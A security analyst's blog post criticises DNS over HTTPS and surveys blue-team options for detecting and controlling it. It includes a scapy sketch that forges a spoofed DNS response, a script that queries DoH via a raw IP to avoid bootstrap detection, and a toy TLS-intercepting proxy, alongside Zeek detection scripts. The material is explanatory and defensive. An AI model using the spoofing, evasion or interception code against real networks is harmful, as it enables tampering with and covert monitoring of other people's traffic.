DNS over HTTPS Part 3: Accidents are on purpose

So this is the third post in my DNS over HTTPS series. I’m going to try and make it the last one. If you’re new here, you can check out part 1 and part 2 on your own, or you can read the TL;DR summary of the story so far that I’m about to vomit all over this post.

The Story So Far

It’s the best story so far. I promise.

I’m concerned about DNS over HTTPS. I think it is a flawed solution that, at best, is a baby step forward for the privacy of DNS data in transit, and a massive step backward in practically every other respect.

– I provided a brief history of the internet and why DNS exists.

– I argued that DNS logs and data are vital for identifying threats to the users, assets, and data I’m charged with protecting, as well as vital for network engineers pinning down the root cause of network performance problems. Taking this data source away creates a massive visibility blind spot, but that’s okay, because privacy.

– I expressed concern that a handful of entities decided, in a very short amount of time, that DNS over HTTPS is the way forward. Because of the stranglehold most of them have on the internet in some way, shape, or form, plus the “cloud revolution”, we are hearkening back to the “good old days” of the ’70s and ’80s: centralized mainframe services, with every action you take on those systems being billable. But it’s okay. Because now you don’t have to manage it.

– I continued to express concern over this consolidation of services and computing resources, stating that it impacts the reliability/availability of various internet services. It’s like putting all of your eggs into one basket, only sometimes you don’t know which basket your eggs are in, and if the basket has a service outage, nobody really acknowledges it until about five hours later. If the basket drops all of your eggs, then it’s considered an acceptable loss.

– I pointed out that a lot of the recommended “privacy respecting”, “secure” DNS services actually declare in their privacy policies that they’re logging your queries. When it comes to accountability for this “respecting privacy”, all I have is the promise of several companies with track records of invading privacy and/or rolling over for governments, intelligence communities, LEO, and sometimes people who just hand them wads of money. Some providers allege that they are audited to ensure the data is being removed and/or redacted properly, but if information security has taught me anything, audits only ensure the letter of the law is respected, not the spirit.

– I expressed annoyance that DoH is essentially a “Rules for Thee, but Not for Me” service: I’m no longer allowed to have DNS logs, but these companies with really shitty track records, who don’t give a shit if you need those DNS logs, are allowed to know all about where you’re going. But it’s okay, because you can trust them. They say that they’re good people.

– I continued ranting in part 2, tearing apart the EFF’s endorsement of the protocol, and analyzing the implications of the RFC itself.

– The EFF says that because DNS isn’t encrypted, it’s vulnerable to inspection and tampering. This is a half-truth. You’re afforded some small amount of confidentiality and integrity in transit, but once the query hits the DoH server, you’re just choosing to place your trust in another entity and hoping for the best. Because that’s how the internet works. At some point, you have to agree to let someone else handle your data. You can’t build a zero-trust network out of a network that is inherently built on trust.

– With regards to tampering with the connection: unless I am in a position to intercept the query (MITM), NOT impact network service, and surreptitiously “beat” the response time of the real DNS server you are attempting to reach (which would involve spoofing that DNS server’s address, matching the src/dst ports and the transaction ID perfectly, BEFORE your packet can reach the legitimate server), the chances of me being able to tamper with your DNS queries in transit are pretty low, at least not without you noticing something (see the sketch after this list). There are plenty of tools for doing MITM over a local network (e.g. ARP spoofing, etc.) but doing it over the internet, with no one noticing, is really fucking hard, and situational at best. See also: QUANTUM

– I pointed out that the RFC lists zero use cases for privacy. The only two use cases afforded are preventing on-path devices from interfering with DNS operations (which, arguably, it does), and exposing DNS directly to browser APIs.

– I talked about how I’m disappointed with DoH because, instead of formulating their own protocol and registering their own service port, they chose to piggyback on HTTP, SSL, and port 443. I believe this is core to their use case of preventing on-path devices (like, say, firewalls) from being able to “interfere” with DNS operations. I mentioned my concern that abuses of the protocol were not considered, and pointed out that there were already two malware campaigns abusing it.

– I mentioned how DoH isn’t some magic protocol; it’s essentially DNS over TCP, wrapped in HTTP, base64url-encoded (or JSON-formatted, depending on the API), and wrapped in TLS. I talked about how all of these layers introduce performance penalties on a very time-sensitive protocol, not to mention how HTTP/2 has to do a bunch of complicated shit to approach the performance of plain DNS over UDP. This means there is potential for bugs due to code complexity, and for the reintroduction of old vulnerabilities in order to “optimize” DNS for HTTP caching. I also acknowledged that regular DNS over UDP has a few exploitable weaknesses of its own, namely spoofing that leads to Denial of Service attacks.

– The EFF shares my sentiment that consolidation of a core internet service into a few hands is a problem, and that it leads to the possibility of censorship and/or something of a privacy problem in and of itself. The solution? Tell everyone (including your ISP, who can now legally sell your DNS data for profit) to run DoH servers. They have absolutely no incentive to do this. Also, they should promise not to censor or sell the data. Okay? I expressed concerns that trusting people who have a bad track record of abusing trust is a bad play.

– I expressed concerns about the second use case of the DoH protocol, exposing DNS /directly/ to browser APIs, and how, combined with how effective browser fingerprinting is in this day and age, it has the potential to MASSIVELY violate your privacy. This use case could easily be abused to track your browsing and web habits with unparalleled effectiveness. I speculated on a number of reasons why the companies and organizations pushing for DoH might have a vested interest in web browsers being DNS-aware, namely when it comes to tracking and advertising: ad-blocking is seen as a nuisance by most content providers today, and this may be the solution none of us actually want, but that they of course want, because money.

– I pondered the wisdom of Google and Mozilla and their desire to make DoH the default in their browsers, choosing to override the system-configured DNS service and/or defaults. I also rambled about how browsers are a monoculture now, with Mozilla and Google controlling essentially the entire browser market now that Microsoft has decided their browser should be built on Chromium. I reminisced about a time when software that changed OS defaults or otherwise hijacked/replaced system services was considered malware. But now it’s okay. Because Mozilla and Google are doing it. I mean, the software is signed, right?
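
To make that forgery race concrete, here’s a rough scapy sketch of what an off-path attacker has to pull off. Every value in it (the victim’s address, the ephemeral port, the transaction ID) is invented, because off-path, you can’t actually observe any of them. That’s the point.

```python
# A sketch of what an off-path DNS forger has to get right, per the recap
# bullet above. Requires scapy (and root to actually send); all values here
# are hypothetical, because an off-path attacker can't observe any of them.
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, send

victim_ip   = "192.0.2.10"   # guessed
resolver_ip = "192.0.2.53"   # known: the server being impersonated
dport       = 33333          # must guess the victim's ephemeral source port
txid        = 0x1a2b         # must guess the 16-bit DNS transaction ID

# The forged answer only lands if src address, ports, and ID all match...
forged = (IP(src=resolver_ip, dst=victim_ip) /
          UDP(sport=53, dport=dport) /
          DNS(id=txid, qr=1, aa=1,
              qd=DNSQR(qname="example.com"),
              an=DNSRR(rrname="example.com", rdata="203.0.113.66")))
send(forged)  # ...AND it arrives before the legitimate response does.
```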

The Last Few Days Have Been Fun

So originally, this blog post was just going to be a summarization of everything I soapboxed about, and then I was going to talk about what I think is the DoH abuse playbook for the blue team. But, well, things happened, like my blog getting cited in a Wired story about the DoH debate. I also got a lesson in what cypherpunk is, and got into a pissing match with a CEO, and oh man, was that a joy.

What ended up happening is that I continued to voice my concerns about DoH being a lateral movement at best, just moving the goalposts of trust to companies and organizations who really don’t deserve it. This ruffled some jammies, because apparently, if you don’t support crypto-all-the-things, it’s WHY DO YOU HATE PRIVACY BRO?

I had one dude tell me (I’m paraphrasing here) that DoH and Cloudflare are “cypherpunk”. I, uh. I don’t know about that. I had to look up the definition of cypherpunk.

a person who uses encryption when accessing a computer network in order to ensure privacy, especially from government authorities

https://www.google.com/search?&q=define%3Acypherpunk

Using encryption doesn’t, by default, make you safe from government authorities. Trusting organizations that are okay with giving your contact information to abusers, kowtowing to repressive government regimes, and running services for hate sites, and assuming they’re going to keep you safe from government authorities, is a bet that I’m not okay with.

In any case, going back to the conversation with the CEO of Cloudflare. As always, it was a Twitter fight, because Twitter is for shitposting and drama. So let’s post some screencaps.

So, most of the time I have a rap on Twitter for being a shitposter and a troll. I guess it’s a fair moniker. But I do have a passion for information security. It is my profession, and something that I do. So I take discussion about it somewhat seriously, if people approach me with their concerns somewhat seriously.

Security is srs bzns.

This was a conversation that chained off of the discussion about cypherpunk and blindly trusting Cloudflare, among others. Matt asked me where privacy is violated, given that the source IP address is not present when querying recursively. I cited the RFC, noting that DNS query information is exposed directly to the browser API, and that there is nothing stopping a website you’re visiting from asking for this information. I continued by voicing my concerns that abuses of this protocol were not considered during its creation, and are still not being considered in its current implementations.

The response more or less downplayed my concerns in a patronizing manner. Which I would expect from any other troll at any other time, but probably not from the CEO of a billion-dollar company with a net worth of over 200 million, trying to win trust (but more importantly, market share! Follow dat mon-e). But I guess downplaying critics is to be expected when you’re trying to establish your own stranglehold on the internet. Can’t let people question the narrative that our VPN that totally isn’t a VPN, and our privacy-respecting DNS service, are both Actually Good For You(tm).

Maybe it’s karmic retribution for being a shitposter. Who knows. But for now, I’m just considering it another data point that they don’t give a shit about the concerns, just the market share and the money.

So, What’s My Playbook, Chief?

I’ve more or less accepted that DNS over HTTPS is coming, regardless of whether I want it, like it, or agree with it. That doesn’t mean that I have to take it silently. As a security analyst and blue teamer, it will be my job, as always, to figure out how to monitor it, control it, and mitigate its abuses. I don’t have a choice in the matter, and the powers that be have made that clear. So if I can’t stop it, what can I do?

As an exercise, I’m going to try to enumerate all of the controls I would consider for controlling, blocking, or otherwise inspecting DoH, and explain how they are all stop-gap and situational at best.

Curl wiki DNS over HTTPS provider list

Pros: The curl wiki has a DNS over HTTPS provider list. You could potentially use this to blacklist DoH providers and severely limit DoH services in and out of your network.

Cons: It’s blacklisting. Blacklists are brittle, but they do one thing and one thing only: identify known bads. Unfortunately, there’s not much this would do if the bad guys stand up their own DoH server. You’re probably thinking to yourself: DoH clients require a plain DNS query to bootstrap, to resolve the DoH server’s domain and kick things off. In normal circumstances, where you’re assuming it’s your average user trying to bypass security policy and not some advanced threat, you’re right. However, the paranoia in me says it’d be trivial for a sufficiently advanced actor to pre-seed the DNS cache with their DoH provider, or edit the HOSTS file to point to their DoH server, do whatever it is they need to do, and then cover their tracks by removing the entry from the HOSTS file or DNS cache (or skip the hostname entirely, as sketched below).
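
To make that paranoia concrete: here’s a minimal sketch of an RFC 8484 DoH query aimed straight at an IP literal, so there’s no bootstrap lookup and no HOSTS file edit for anyone to catch. It uses Cloudflare’s well-known 1.1.1.1 purely as an example endpoint (their certificate covers the bare IP, so TLS validation still passes); a real bad actor would point it at their own server. It also happens to demonstrate the base64url-wrapped wire-format layering I groused about in the recap.

```python
# A minimal RFC 8484 DoH query against a raw IP literal: no plain-DNS
# bootstrap query ever happens for a resolver blacklist to catch.
# 1.1.1.1 is used purely as a well-known example endpoint.
import base64
import urllib.request

# A hand-built DNS wire-format query for example.com/A:
# header (id=0, RD=1, 1 question) + QNAME + QTYPE=A + QCLASS=IN
query = (b"\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
         b"\x07example\x03com\x00\x00\x01\x00\x01")

# GET form: base64url-encode the wire format, strip the padding
b64 = base64.urlsafe_b64encode(query).rstrip(b"=").decode()
req = urllib.request.Request(
    "https://1.1.1.1/dns-query?dns=" + b64,
    headers={"Accept": "application/dns-message"})
with urllib.request.urlopen(req) as resp:
    print(resp.status, len(resp.read()), "bytes of DNS answer, port 53 never touched")
```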

Other thoughts: As shitty as blacklists are, if you block access to the most common DoH providers, a lot of the low-hanging fruit gets handled, and in the worst-case scenario, clients may fall back to standard DNS. Recently, I discovered at work that Palo Alto allegedly does app detection of DoH, but based on this article, I’m under the impression they’re doing blacklisting. You could achieve the same level of effectiveness with a Snort or Suricata DNS rule looking for queries to the domains Google, PowerDNS, and Cloudflare host their DoH services on, to catch the initial plain-DNS bootstrap query (a rough equivalent is sketched below).
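
For the sake of illustration, here’s the poor man’s version of that rule as a script instead: scan a Zeek dns.log for bootstrap lookups of known DoH hostnames. The hostname list is a tiny sample in the spirit of the curl wiki list, and the column index assumes a stock, recent Zeek dns.log schema, so check yours before trusting it.

```python
# Flag plain-DNS "bootstrap" lookups for known DoH provider hostnames in a
# Zeek dns.log. The hostname list is a small sample; a real deployment
# would sync the full curl wiki list on a schedule.
DOH_HOSTNAMES = {
    "dns.google",
    "cloudflare-dns.com",
    "mozilla.cloudflare-dns.com",
    "dns.quad9.net",
    "doh.powerdns.org",
}

with open("dns.log") as f:
    for line in f:
        if line.startswith("#"):          # skip Zeek header/metadata lines
            continue
        fields = line.rstrip("\n").split("\t")
        # fields[9] is 'query' and fields[2] is 'id.orig_h' in a stock
        # recent Zeek dns.log -- verify against your own #fields header.
        if len(fields) > 9 and fields[9].rstrip(".").lower() in DOH_HOSTNAMES:
            print("DoH bootstrap lookup for", fields[9], "from", fields[2])
```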

SSL Inspection

Pros: SSL inspection, or as some others call it, SSL MITM, essentially means establishing your own CA, creating a certificate, pushing it to clients under your control so they trust it, and placing a MITM system/proxy between your clients and the SSL sites they want to reach. The proxy more or less “bridges” the SSL connections between the internet and your clients, but is able to collect the plaintext, or forward the plaintext traffic to other network devices/processes for inspection. Sometimes this is called an SSL-terminating proxy, because it essentially has to handle SSL negotiation, setup, and termination between the client and server endpoints to work effectively.

Source: https://www.symantec.com/content/dam/symantec/docs/other-resources/responsibly-intercepting-tls-and-the-impact-of-tls-1.3-en.pdf
Note: Ignore the verbiage, focus on the technical aspects. Notice how there are two TLS sessions: one from C(lient) to TIA (the intercept proxy), and one from TIA to S(erver).

This is one way of doing it, and with TLS 1.3 using ephemeral EC-DHE key exchange for session setup, and being able to detect when something is trying to downgrade it to TLS 1.2 (or earlier), it’s the way that still actually works, and really, it’s all you need to know. You can look into passive SSL decryption if you wanna learn the Old Ways™.

Having visibility into TLS streams lets you see everything. That means seeing DoH communications, logging them, and parsing them. It also means seeing every other TLS conversation, and everything that comes with that.
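
To make the “two TLS sessions” picture concrete, here’s a deliberately toy sketch of a terminating bridge. Everything in it is an assumption for illustration: proxy-cert.pem/proxy-key.pem are presumed signed by the corporate CA you already pushed to clients, the upstream is hardcoded, there’s no SNI handling, and the error handling is nonexistent. Real products do vastly more; this just shows where the plaintext becomes visible.

```python
# Toy TLS-terminating bridge: one TLS session client<->proxy (our CA-signed
# cert), a second TLS session proxy<->real server, plaintext visible in the
# middle. Illustration only -- hardcoded upstream, no SNI, no cleanup.
import socket
import ssl
import threading

UPSTREAM = ("dns.google", 443)  # hypothetical: the real server the client wanted

def pump(src, dst, label):
    # Copy bytes one way, logging the now-visible plaintext as it passes.
    while True:
        data = src.recv(4096)
        if not data:
            break
        print(f"[{label}] {len(data)} bytes: {data[:60]!r}")
        dst.sendall(data)

def handle(client_tls):
    # Session #2: proxy -> real server. The client never sees the real cert.
    up_ctx = ssl.create_default_context()
    upstream = up_ctx.wrap_socket(socket.create_connection(UPSTREAM),
                                  server_hostname=UPSTREAM[0])
    threading.Thread(target=pump, args=(client_tls, upstream, "C->S"),
                     daemon=True).start()
    pump(upstream, client_tls, "S->C")

# Session #1: client -> proxy, presented with our CA-signed certificate.
srv_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
srv_ctx.load_cert_chain("proxy-cert.pem", "proxy-key.pem")
listener = socket.create_server(("0.0.0.0", 8443))
while True:
    conn, _ = listener.accept()
    try:
        handle(srv_ctx.wrap_socket(conn, server_side=True))
    except (ssl.SSLError, OSError):
        pass
```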

Cons: SSL inspection is expensive in every sense of the word. Politically and socially, privacy advocates will ruin your shit if you say you support it. The “WHY DO YOU HATE PRIVACY, BRO?” super team will be out in full force, asking if you like to kill cyber puppies while you’re at it. Privacy advocates will compare you to oppressive regimes around the world, even if you point out that you have a responsibility to defend the network, the users, the assets, and the data. Even if you point out that the users have no reasonable expectation of privacy while using assets they don’t own, with endpoint security software watching them, on network access that isn’t theirs either. And that’s not counting the pressure you’ll get from inside your org. Imagine the C-suite knowing that you know exactly which Xhamster videos they watch, and when they watched them. That might rustle the jimmies of those who believe the rules of Acceptable Use don’t apply to them.

Ceiling Admin knows your fetishes and wishes to god they didn’t.


Not only is it politically/socially expensive, it’s monetarily expensive. Some network security appliances claim they can do SSL inspection in addition to a host of other functions, but normally, if you turn on SSL inspection alongside the rest of those functions, it tanks performance, because maintaining what is essentially two SSL connections for every client reaching out to something on the internet is extremely expensive, performance-wise. Not to mention needing the resources and I/O to log the plaintext somewhere while you’re doing all of this, plus the fast storage to hold all of it as it comes in. That means you need money for beefy boxes to handle the TLS, fuckhueg fast disk arrays to handle logging the data, and probably either time to write a parser for DoH logs for ELK, or money to pay someone to do it for Splunk, or whatever SIEM you use to make the data usable.

Finally, it’s expensive security-wise, because if you mismanage it and/or don’t secure access to the decrypted logs, the certificates, and/or the private keys, the bad guys can simply collect the decrypted data for their own uses. This is called “third-party collection”: letting someone else do the heavy lifting for you and reaping the benefits. Managing that risk often means adding exceptions for what gets inspected, to make sure you aren’t logging credentials to, say, banking websites or social media.

Other Thoughts: To my knowledge, as of today, no open-source or freemium SSL MITM suite actually supports TLS v1.3. I thought that PolarProxy might, but it just force-downgrades to TLS v1.2. Not to mention it’s “freemium” software: you can decrypt up to 10,000 sessions a day, but beyond that, you gotta pay. And chances are, if you have to ask how expensive it is, you probably can’t afford it.

Netflow, conversation size, and frequency analysis to find unauthorized DoH servers

Pros: Netflow, for those of you unfamiliar with the term, is more or less a network inspection data source that gives you metadata about a connection without actually performing deep packet inspection. A lot of NSM software packages collect netflow-like data; e.g., Suricata calls them flow records, whereas Zeek/Bro calls them connection logs. With these logs, I know who was involved (IP addresses), what time the connection started, when it ended, how long it spanned, what transport protocol was used (e.g. TCP, UDP, ICMP), the src/dst ports (if TCP or UDP was used), how many packets were transferred by both the session initiator (usually the client) and the responder (usually the server), and how many bytes were transferred by both sides. There is a lot you can glean about a connection without actually inspecting its contents. The task here would be applying this metadata collection to HTTPS connections in order to reliably detect DNS over HTTPS comms.

This is a screenshot from “ntopng”, another network flow monitoring suite. Netflow data is incredibly powerful.

If this can be done reliably, it could serve as a solid detection method. Imagine being able to look at a collection of netflow records and reliably determine that DoH was being used. You could probably do frequency analysis to detect rogue DoH usage (e.g. “I wonder why we have so much HTTPS communication to these IP addresses, and when I navigate to them there is no content, or content related to using it as a DoH server. How funny.”). You might also be able to find bad-actor DoH via least frequent occurrence (e.g. “There are a handful of connections to this IP address over HTTPS. The connections are small, short-lived, and only a few clients seem to be connecting to it. Also, the server doesn’t seem to exist anymore. I wonder why that is.”). You might also be able to figure out which TLS comms are DoH by doing size analysis of the conversation: the client requests and the server responses should both be small. Frequency of the connections ultimately depends on how many resolutions the client is attempting, but if it’s rogue DoH usage, there should be a lot of small, short-lived connections in rapid succession (a rough sketch of this heuristic follows below).
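
As a starting point for that lab work, here’s a rough sketch of the heuristic over a Zeek conn.log. The thresholds (under five seconds, under 2,000 bytes from the client, more than 50 such flows to one host) are invented for illustration and would need serious tuning, and the column layout assumes a stock conn.log.

```python
# Rough hunt heuristic over a Zeek conn.log: flag destinations that receive
# many small, short-lived TLS/443 flows. Thresholds are illustrative only.
from collections import defaultdict

# Column layout assumes a stock conn.log; verify against your #fields header.
COLS = ["ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
        "proto", "service", "duration", "orig_bytes", "resp_bytes"]

def num(value, cast=float):
    # Zeek writes "-" for unset fields
    return cast(value) if value not in ("-", "") else 0

flows = defaultdict(list)
with open("conn.log") as f:
    for line in f:
        if line.startswith("#"):        # skip Zeek header/metadata lines
            continue
        row = dict(zip(COLS, line.rstrip("\n").split("\t")))
        if row.get("id.resp_p") == "443" and row.get("proto") == "tcp":
            flows[row["id.resp_h"]].append(row)

for dst, conns in flows.items():
    small = [c for c in conns
             if num(c.get("duration", "-")) < 5.0            # short-lived
             and num(c.get("orig_bytes", "-"), int) < 2000]  # tiny requests
    if len(small) > 50:  # many of them, to one host: smells like per-query DoH
        print(f"{dst}: {len(small)} small short-lived TLS flows - worth a look")
```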

Cons: While a lot of the analysis I’m recommending could probably be done given enough time, testing, and patience, I feel like this doesn’t fall into security operations easily. It’s not standard and repeatable. It’s prone to error, meaning it can’t easily be automated (parts of it could be, but not the whole thing) and will require human analysis to make determinations. For example, there are plenty of other web applications communicating over HTTPS that have numerous small, short-lived connections.

This turns it into a threat hunting operation, and not so much something you can generate repeatable, rapidly actionable alerts on, like, say, endpoint protection signature alerts and/or IDS/IPS alerts. Not a lot of organizations have the time, resources, or maturity to be performing hunt operations, making this a super difficult pill to swallow. The long and short of it is that it’s possible, but pretty difficult.

Other thoughts: This is probably one of the few ways forward I can see for detecting rogue DoH abuse “reliably”. What’s even better is that security controls are cumulative: you could easily pair netflow analysis/hunting with a blacklist of known DoH providers. No one security control is a silver bullet, but every roadblock or mitigation you put up helps. I plan on working on this in the lab to see how feasible flow data analysis for finding DoH actually is.

JA3/JA3S (AKA SSL Fingerprinting)

Pros: You’re able to fingerprint what the SSL HELLO message from a given client looks like (JA3), and what the SSL HELLO the DoH server’s SSL implementation sends back to that given client looks like (JA3S).

Cons: This is more or less useless for actually controlling DoH connections; it’s about fingerprinting clients and servers. As it turns out, a lot of the DoH providers have a massive number of servers that are identically spec’d and configured, and that support the same ciphers, so they respond identically when sent the same SSL HELLO from a given client.

So let’s say you were gonna try to use a JA3S fingerprint to detect when your clients access a DoH service from, say, a large cloud provider. You somehow managed to configure something to block traffic when this JA3S fingerprint is encountered, or (more sanely) configured it to alert you. You could end up alerting whenever your client systems access anything from that cloud provider/CDN, or huge parts of it, if the same SSL HELLO response is sent by the majority of the CDN’s servers.

Let’s say you went the opposite route and wanted to use JA3 client SSL HELLO fingerprinting. Let’s also say that you use Mozilla Firefox ESR, and you want to alert when you encounter the JA3 fingerprint of the client making a DoH request. You’ve effectively identified when your Firefox clients are making any SSL requests at all. Not very useful for our purposes, but there are some implications there that I may consider writing about in the future.

JA3 is more about service and client fingerprinting than it is about fingerprinting what DoH comms in particular look like. Worthless for what I’m trying to achieve, but not altogether worthless.
Source: https://www.ntop.org/ndpi/tls-ssl-analysis-when-encryption-and-safety-are-not-alike/

Other thoughts: I was spitballing ideas when I thought about JA3/JA3S. I thought it was hashing SSL certificates or something like that; I didn’t actually realize what JA3 hashes tracked until I read more about the spec. Also, why in heaven’s name would you choose MD5 as the hash type in this day and age?
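
For reference, here’s what a JA3 client fingerprint actually hashes, per the salesforce/ja3 spec: five fields pulled from the client HELLO, comma-separated, with multi-value fields dash-joined, then (yes) MD5’d. The field values below are invented for illustration, not a real browser’s HELLO.

```python
# What a JA3 fingerprint hashes: "SSLVersion,Ciphers,Extensions,
# EllipticCurves,EllipticCurvePointFormats". Values below are made up.
import hashlib

tls_version   = 771                        # 0x0303 = TLS 1.2 in the hello
ciphers       = [4865, 4866, 4867, 49195]  # offered cipher suites
extensions    = [0, 23, 65281, 10, 11]     # extension types, in order sent
curves        = [29, 23, 24]               # supported groups
point_formats = [0]

ja3_string = ",".join([
    str(tls_version),
    "-".join(map(str, ciphers)),
    "-".join(map(str, extensions)),
    "-".join(map(str, curves)),
    "-".join(map(str, point_formats)),
])
print(ja3_string)                                    # the raw fingerprint
print(hashlib.md5(ja3_string.encode()).hexdigest())  # the JA3 hash. MD5. Really.
```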

We Do as We Always Have: Take Out the Trash

As I have stated before, DoH is here to stay. That doesn’t mean I have to lie down and take it, because some dudes out in Silicon Valley with the money, clout, motivation and the will to back yet another consolidation power play said ‘deal with it’. Well, I’m dealing with it, just not in the way you expected. I’m a computer janitor, and I’ll do what I have always done: take out the fuckin’ trash.

I was originally going to post Walter from Hellsing here, but turns out that he sides with the Nazis. I was then going to use Sebastian from Black Butler, but I’m not actually Satan. So Trashterpiece dumpster fire it is.

In the past decade or so that I have spent in information security, the majority of my time has been spent on the blue team: those dudes tasked with rigging together a bunch of shit to keep the users, the companies, the assets, and the data safe from the many terrors and under-baked concepts of the internet.

You can tell the users to watch out for themselves, but in the end, even trained professionals can fall for social engineering, and user education is woefully inadequate. Not because the users don’t listen, but because nine times out of ten, it’s useless, cookie-cutter, mandatory template training that makes absolutely no effort to relate to the user community, or to explain why we need their help to do our job effectively.

Because of this inability to relate to our users, and to relate our job function to theirs, we often get asked why they should be doing our job for us. Honestly, that onus lies on us, for being terrible at communication and empathy, and for assuming that users who have other job functions to perform are stupid.

You’re probably wondering what the hell user awareness and social engineering have to do with DoH, and with its huge potential for abuse being treated as a ‘deal with it’ afterthought. I’m here to tell you: more than you think.

Most adversaries score their initial access by convincing a user that they are someone they are not, or to trust in something they should be questioning. DoH is just another abusable protocol that is inevitably going to be used for C2 once the bad guys get a user to click the phishing link or open the attachment.

A lot of the protocols, software, and applications floating around on the internet were built with the best intentions, but without thought for the consequences of abuse. After all, the internet, and a lot of the technologies that rely upon it, are built on this inherent idea of trust. You have to trust carriers not to tamper with your data in transit. You have to trust ISPs and backbone providers to peer with one another so your data gets from source to destination. You have to trust others with your data at some point, encrypted or not. If they don’t carry it, it doesn’t reach its destination.

DNS over HTTPS wasn’t the only way forward. Considering that privacy isn’t mentioned at all in the DoH RFC, and that one of its two main use cases was ensuring the integrity of DNS data in transit, DNSCrypt would have easily met the integrity-in-transit goal, and/or DNSSEC would have provided better integrity in transit, as well as integrity and authentication of the records returned. DNS over TLS would have been an implementation that gave users and their networks the capacity to choose whether or not to opt in to the protocol, instead of saying “lol, it’s now the default in your browser, it uses HTTPS, and since browsers are a monoculture, you have no choice but to accept it. Or do you hate privacy, broh?”

The only other use case mentioned in the DoH RFC is exposing DNS directly to browser APIs, and that should terrify you and seriously make you worry about the privacy of your browsing data.

I’m not saying any of those other ideas for DNS were perfect, or that they didn’t have their issues and flaws. What I’m saying is that we had choices, and these large entities consolidating what defines the internet took those choices away with their leverage. My soapbox isn’t as big as theirs, but self-hosting lets me have a soapbox all the same. So if I have to fuckin’ deal with it, I’m going to make you suffer every step of the way, and let you know that I’ll be the one watching for and considering the abuses, even if you aren’t.